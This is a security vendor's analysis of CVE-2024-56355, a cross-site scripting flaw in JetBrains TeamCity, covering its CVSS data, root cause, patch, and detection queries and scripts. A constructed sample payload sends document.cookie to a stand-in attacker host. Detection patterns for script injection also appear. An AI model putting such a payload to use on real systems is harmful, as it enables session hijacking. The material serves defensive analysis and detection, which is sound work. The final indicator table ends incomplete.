July 25, 2025

CVE-2024-56355: XSS Vulnerability in JetBrains TeamCity

by CyRisk

    Comprehensive Analysis of CVE-2024-56355: JetBrains TeamCity XSS Vulnerability

    CVE ID: CVE-2024-56355
    CVSS Score: 5.4 (MEDIUM)
    Publicly Disclosed: 2024-12-20
    Last Updated: 2025-01-02


    1. Vulnerability Overview

    CVE-2024-56355 is a cross-site scripting (XSS) vulnerability in JetBrains TeamCity On-Premises versions prior to 2024.12. The flaw arises from a missing Content-Type header in responses generated by the RemoteBuildLogController: with no declared type, the victim's browser may sniff the response body as HTML and execute any script embedded in it within the TeamCity origin[1][6][16].

    Key Parameters:

    1. CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    2. Attack Complexity: LOW
    3. Privileges Required: LOW (the attacker needs a TeamCity account)
    4. User Interaction: REQUIRED (victim must click a malicious link)
    5. Affected Products: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* (all versions before 2024.12)[1][5][13]

    2. Threat Intelligence & Active Exploitation

    Active Exploitation Status

    As of July 2025, no public reports of CVE-2024-56355 being exploited in the wild exist. Neither threat actor groups nor malware campaigns have been linked to this vulnerability[10][34]. This aligns with its medium severity and the requirement for user interaction[1][16].

    Related Security Context

    1. CVE-2024-27198/CVE-2024-27199: Critical TeamCity vulnerabilities patched in March 2024, an authentication bypass (CVSS 9.8) and a path traversal (CVSS 7.3); CVE-2024-27198 was subsequently exploited in the wild[2][3][21].
    2. CVE-2024-56356: High-severity XML external entity (XXE) vulnerability (CVSS 7.1) in TeamCity versions before 2024.12, patched in the same release[1][5][31].

    3. Technical Analysis

    Root Cause & Attack Vector

    The RemoteBuildLogController returns certain responses without a Content-Type header. A browser that receives a body with no declared type falls back to content sniffing, and a body that begins with HTML-looking bytes is rendered as a document in the TeamCity origin. An attacker with a low-privileged TeamCity account (PR:L in the vector) can therefore:

    1. Craft a malicious URL: Inject script-like text into what the build log endpoint returns and deliver the link to an authenticated TeamCity user via phishing.
    2. Run script in the victim's session: Once the browser executes the payload in the TeamCity origin, the attacker can:
      1. Hijack authentication tokens
      2. Steal session cookies
      3. Execute arbitrary JavaScript against the TeamCity UI[1][6][34].

    Limitations:

    1. No unattended exploitation: Requires victim interaction (opening the link; UI:R in the vector).
    2. No RCE: Unlike recent critical TeamCity flaws (e.g., CVE-2024-27198), this vulnerability does not enable code execution[3][21].
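    The mechanism above, as an added example that is not JetBrains' code: a hypothetical build-log handler in plain Python, served once as the vulnerable variant (body with no Content-Type) and once hardened, with a simplified model of the browser's MIME-sniffing decision. The real controller is a Java class inside TeamCity and its request path is not given on this page, so only the header behaviour is modelled; the log contents and the `attacker.example` host are constructed.

```python
"""Why a missing Content-Type on a build-log response turns into XSS, and what
the hardened response looks like.

Added example, not JetBrains' code: it models a hypothetical build-log handler
in plain Python. The real controller is a Java class inside TeamCity and its
request path is not given on this page, so only the header behaviour is modelled.
"""
from dataclasses import dataclass, field

# Constructed samples. A build can print anything into its log, so an attacker
# with rights to run a build controls log text. Browsers sniff only the start of
# an undeclared body, so the attacker text is placed first here.
ATTACKER_LOG = b"<script>fetch('https://attacker.example/?c='+document.cookie)</script>\n"
BENIGN_LOG = b"[12:00:01] Step 1/3: Compile (Gradle)\n[12:00:07] BUILD SUCCESSFUL\n"

# Prefixes the WHATWG MIME sniffing algorithm maps to text/html when the
# response carries no Content-Type; each must be followed by a space or '>'.
_HTML_PREFIXES = (b"<!doctype html", b"<html", b"<head", b"<script", b"<iframe",
                  b"<h1", b"<div", b"<font", b"<table", b"<a", b"<style",
                  b"<title", b"<b", b"<body", b"<br", b"<p", b"<!--")


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)  # header name -> value
    body: bytes = b""


def serve_build_log(log: bytes, hardened: bool) -> Response:
    """Vulnerable variant: body only, no Content-Type (the bug described above).
    Hardened variant: explicit plain-text type, nosniff, and attachment disposition."""
    resp = Response(200, body=log)
    if hardened:
        resp.headers["Content-Type"] = "text/plain; charset=utf-8"
        resp.headers["X-Content-Type-Options"] = "nosniff"   # defence in depth
        resp.headers["Content-Disposition"] = 'attachment; filename="build.log"'
    return resp


def sniffed_as_html(body: bytes) -> bool:
    """Simplified WHATWG sniff: skip leading whitespace, then match an HTML tag
    prefix followed by a tag-terminating byte (0x20 or 0x3E)."""
    head = body.lstrip(b" \t\n\r\x0c")[:64].lower()
    for prefix in _HTML_PREFIXES:
        if head.startswith(prefix) and len(head) > len(prefix) \
                and head[len(prefix)] in (0x20, 0x3E):
            return True
    return False


def browser_renders_as_html(resp: Response) -> bool:
    """A declared Content-Type wins; an undeclared one is sniffed from the body."""
    declared = resp.headers.get("Content-Type", "").lower()
    if declared:
        return declared.startswith("text/html")
    return sniffed_as_html(resp.body)


def script_would_run(resp: Response) -> bool:
    """True when the victim's browser would render the response as a document in
    the TeamCity origin and execute any <script> in it."""
    disposition = resp.headers.get("Content-Disposition", "").lower()
    if disposition.startswith("attachment"):
        return False  # saved to disk, never rendered
    return browser_renders_as_html(resp)


if __name__ == "__main__":
    for name, log in (("attacker", ATTACKER_LOG), ("benign", BENIGN_LOG)):
        for hardened in (False, True):
            r = serve_build_log(log, hardened)
            print(f"{name:8} hardened={hardened!s:5} script_runs={script_would_run(r)}")
```

    The model deliberately shows why a declared `text/plain` alone closes the hole (the browser never sniffs a declared type) and why `nosniff` plus an attachment disposition are worth keeping as defence in depth; it also shows the practical caveat that sniffing inspects only the start of the body, so where attacker-controlled text lands in the response matters.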

    4. Vendor & Industry Response

    Patch Information

    1. Fixed Version: TeamCity 2024.12 (released December 2024)[24][25].
    2. Security Notes: The 2024.12 release addressed multiple security issues, including several XSS (CWE-79) flaws and the XXE flaw CVE-2024-56356[25][26].

    Disclosure Timeline

    | Event | Date | Source |
    |---|---|---|
    | Vulnerability Discovered | ~December 2024 | JetBrains Internal |
    | Patch Released | December 2024 | TeamCity 2024.12 Update |
    | Public Disclosure | 2024-12-20 | CVE record |
    | CISA KEV Status | Not Included | CISA Bulletin [15][48] |


    5. Detection & Monitoring Strategies

    Network/Log Signatures

    While no public exploit exists, consider monitoring for:

    1. HTTP Requests: Requests to the build log endpoint whose path or query string carries script-like content (`<script`, `javascript:`, or their URL-encoded forms). Note that `/admin/diagnostic.jsp` and `/app/https/settings/*` belong to the CVE-2024-27199 detection rules and are not indicators of this flaw[2].
    2. Response Headers: Responses from the build log endpoint on pre-2024.12 servers that carry no Content-Type header. Standard access logs do not record response headers, so the reverse proxy in front of TeamCity must be configured to log them; confirming that every server runs 2024.12 or later is the simpler control.
    3. Web Logs: Unusual patterns in build log access or JavaScript errors in the TeamCity UI[10][34].

    SIEM Queries (Example for Splunk; field names depend on your proxy's log format, and the response Content-Type must be logged, here as resp_content_type, for the query to work):

    sourcetype=http_access http.method=GET http.url="*RemoteBuildLogController*" http.status=200 NOT resp_content_type=*
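    The same two checks run over proxy logs offline, as an added example that is not part of the original post. It assumes the reverse proxy in front of TeamCity writes one JSON object per request with the fields used below (nginx can record the response type through `$sent_http_content_type` in a custom `log_format`); the path marker mirrors the controller name used in the query above and is a placeholder for the real request path, and the log lines are constructed.

```python
"""Scan reverse-proxy logs for the two signals above: build-log responses sent
without a Content-Type, and script-like payloads in requests to that endpoint.

Added example, not part of the original post. Assumptions: the proxy in front of
TeamCity emits one JSON object per request with the fields used below (nginx can
record the response type via $sent_http_content_type in a custom log_format), and
the path marker mirrors the controller name used on this page; replace it with the
real request path of your deployment.
"""
import json
import re
from urllib.parse import unquote_plus

BUILD_LOG_MARKERS = ("remotebuildlogcontroller",)   # placeholder path fragment, lower-case
SCRIPT_RE = re.compile(r"<\s*script|javascript:", re.IGNORECASE)

# Constructed sample log lines; they are not from a real TeamCity instance.
SAMPLE_LOG = """\
{"ts":"2024-12-21T10:00:01Z","src":"10.0.0.5","method":"GET","path":"/app/RemoteBuildLogController?buildId=4711","status":200,"resp_content_type":"text/plain; charset=utf-8"}
{"ts":"2024-12-21T10:00:02Z","src":"10.0.0.5","method":"GET","path":"/app/RemoteBuildLogController?buildId=4712","status":200,"resp_content_type":""}
{"ts":"2024-12-21T10:00:03Z","src":"203.0.113.9","method":"GET","path":"/app/RemoteBuildLogController?buildId=4712&x=%3Cscript%3Ealert(1)%3C%2Fscript%3E","status":200,"resp_content_type":""}
{"ts":"2024-12-21T10:00:04Z","src":"10.0.0.7","method":"GET","path":"/overview.html","status":200,"resp_content_type":"text/html; charset=utf-8"}
"""


def analyze(entry: dict) -> list:
    """Return the rule names an entry triggers; only build-log requests are inspected."""
    path = entry.get("path", "")
    if not any(marker in path.lower() for marker in BUILD_LOG_MARKERS):
        return []
    findings = []
    ctype = (entry.get("resp_content_type") or "").strip().lower()
    if entry.get("status") == 200 and not ctype:
        # The pre-2024.12 behaviour: a successful response with no declared type.
        findings.append("missing-content-type")
    elif ctype.startswith("text/html"):
        # A log endpoint should never declare HTML; treat it as suspicious too.
        findings.append("html-content-type-on-log-endpoint")
    if SCRIPT_RE.search(unquote_plus(path)):
        # Decode before matching so %3Cscript%3E is caught as well as <script>.
        findings.append("script-like-payload-in-request")
    return findings


def scan(log_text: str) -> list:
    """Return (timestamp, source IP, findings) for each line that triggers a rule."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        findings = analyze(entry)
        if findings:
            hits.append((entry["ts"], entry["src"], findings))
    return hits


if __name__ == "__main__":
    for ts, src, findings in scan(SAMPLE_LOG):
        print(ts, src, ", ".join(findings))
```

    The request-side rule is kept narrow on purpose (`<script` and `javascript:` only); broader patterns such as `on\w+=` match ordinary TeamCity parameter names and generate noise. The response-side rule is the one that actually distinguishes an unpatched server, and it only works if the proxy logs the response Content-Type.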

    Behavioral Indicators

    | Indicator Type | Description |
    |---|---|
    | Network Traffic | Unusual GET requests to build log endpoints |
    | Session Context | Redirection to attacker-controlled domains |
    | Payload Analysis | |
